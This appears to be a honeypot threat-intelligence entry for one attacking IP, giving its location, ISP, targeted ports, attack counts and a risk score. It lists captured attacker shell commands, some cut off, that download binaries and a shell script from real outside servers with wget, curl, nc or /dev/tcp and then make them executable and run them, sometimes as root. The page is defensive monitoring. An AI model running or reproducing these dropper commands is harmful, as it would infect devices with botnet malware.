Active Threat: CRITICAL

204.76.203.8

Country of Origin: 🇳🇱 Netherlands
First Detection: 28/12/2025
Last Activity: 22/2/2026
ISP: Pfcloud UG (haftungsbeschrankt)
Total Attacks: 4427
Ports: 15
Attack Types: 6
Malware: 0

Geolocation

Country: 🇳🇱 Netherlands
City: Eygelshoven
ASN: AS51396
ISP: Pfcloud UG (haftungsbeschrankt)

Attack Types

h0neytr4p
honeyaml
adbhoney
dionaea
tanner
honeytrap

Attacked Ports

80, 81, 443, 3000, 3001, 3128, 5555, 6036, 8000, 8081, 8888, 17000, 45634, 55000, 61616

Associated Malware

No associated malware

Executed Commands

$ cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f parm7 parm5 parm6 parm; mkdir -p /data/local/tmp 2>/dev/null; (wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || curl -fsSL -o parm7 http://45.148.120.23/bins/parm7 2>/dev/null || nc 45.148.120.23 3338 > parm7 2>/dev/null || toybox nc 45.148.120.23 3338 > parm7 2>/dev/null || bash -c "cat < /dev/tcp/45.148.120.23/3338 > parm7" 2>/dev/null  [199x]
$ cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f parm7 parm5 parm6 parm; mkdir -p /data/local/tmp 2>/dev/null; (wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || curl -fsSL -o parm7 http://45.148.120.23/bins/parm7 2>/dev/null || nc 45.148.120.23 3338 > parm7 2>/dev/null || toybox nc 45.148.120.23 3338 > parm7 2>/dev/null || bash -c "cat < /dev/tcp/45.148.120.23/3338 > parm7" 2>/dev/null  [26x]
$ cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 1007 > parm7; toybox nc 130.12.180.76 1005 > parm5; toybox nc 130.12.180.76 1006 > parm6; toybox nc 130.12.180.76 1004 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;  [23x]
$ cd /tmp 2>/dev/null || cd /data/local/tmp; rm -f parm7 parm5 parm6 parm; (wget -q -O parm7 http://130.12.180.76/bins/parm7 || busybox wget -q -O parm7 http://130.12.180.76/bins/parm7 || toybox nc 130.12.180.76 3338 > parm7 || nc 130.12.180.76 3338 > parm7); (wget -q -O parm5 http://130.12.180.76/bins/parm5 || busybox wget -q -O parm5 http://130.12.180.76/bins/parm5 || toybox nc 130.12.180.76 3336 > parm5 || nc 130.12.180.76 3336 > parm5); (wget -q -O parm6 http://130.12.180.76/bins/parm6 || busy  [18x]
$ cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 3338 > parm7; toybox nc 130.12.180.76 3336 > parm5; toybox nc 130.12.180.76 3337 > parm6; toybox nc 130.12.180.76 3335 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;  [15x]
$ cd /tmp 2>/dev/null || cd /data/local/tmp; rm -f parm7 parm5 parm6 parm; (wget -q -O parm7 http://185.232.205.249/bins/parm7 || busybox wget -q -O parm7 http://185.232.205.249/bins/parm7 || toybox nc 185.232.205.249 3338 > parm7 || nc 185.232.205.249 3338 > parm7); (wget -q -O parm5 http://185.232.205.249/bins/parm5 || busybox wget -q -O parm5 http://185.232.205.249/bins/parm5 || toybox nc 185.232.205.249 3336 > parm5 || nc 185.232.205.249 3336 > parm5); (wget -q -O parm6 http://185.232.205.249/  [11x]
$ cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f kla.sh; wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null || busybox wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null || curl -sLo kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null || nc 45.148.120.23 3342 > kla.sh 2>/dev/null; [ -s kla.sh ] && chmod +x kla.sh 2>/dev/null && sh kla.sh 2>/dev/null &  [5x]
$ cd /tmp; rm -f parm7 parm5 parm6 parm; (wget -q -O parm7 http://130.12.180.76/bins/parm7 || busybox wget -q -O parm7 http://130.12.180.76/bins/parm7 || toybox nc 130.12.180.76 3338 > parm7 || nc 130.12.180.76 3338 > parm7); (wget -q -O parm5 http://130.12.180.76/bins/parm5 || busybox wget -q -O parm5 http://130.12.180.76/bins/parm5 || toybox nc 130.12.180.76 3336 > parm5 || nc 130.12.180.76 3336 > parm5); (wget -q -O parm6 http://130.12.180.76/bins/parm6 || busybox wget -q -O parm6 http://130.12  [5x]
$ cd /tmp 2>/dev/null || cd /data/local/tmp; rm -f parm7 parm5 parm6 parm; (wget -q -O parm7 http://45.194.92.30/bins/parm7 || busybox wget -q -O parm7 http://45.194.92.30/bins/parm7 || toybox nc 45.194.92.30 3338 > parm7 || nc 45.194.92.30 3338 > parm7); (wget -q -O parm5 http://45.194.92.30/bins/parm5 || busybox wget -q -O parm5 http://45.194.92.30/bins/parm5 || toybox nc 45.194.92.30 3336 > parm5 || nc 45.194.92.30 3336 > parm5); (wget -q -O parm6 http://45.194.92.30/bins/parm6 || busybox wget  [4x]
$ cd /data/local/tmp || cd /tmp || cd /cache; rm -f parm7 parm5 parm6 parm; wget -q -O parm7 http://45.148.120.23/bins/parm7 || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 || nc 45.148.120.23 3338 > parm7; wget -q -O parm5 http://45.148.120.23/bins/parm5 || busybox wget -q -O parm5 http://45.148.120.23/bins/parm5 || nc 45.148.120.23 3336 > parm5; wget -q -O parm6 http://45.148.120.23/bins/parm6 || busybox wget -q -O parm6 http://45.148.120.23/bins/parm6 || nc 45.148.120.23 3337 > parm  [4x]

Risk Assessment

80/100
Scale: Low, Medium, High, Critical